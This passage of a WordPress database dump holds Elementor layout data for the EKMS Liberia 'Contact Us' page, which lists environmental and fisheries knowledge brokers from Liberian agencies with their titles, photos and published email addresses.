cc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"625a74e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9bf0510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e162bb8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"593819f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3ef1bd5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"334f9e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24460,3609,'_elementor_edit_mode','builder'),(24461,3609,'_elementor_template_type','wp-page'),(24462,3609,'_elementor_version','3.0.16'),(24463,3609,'_wp_page_template','default'),(24464,3609,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a 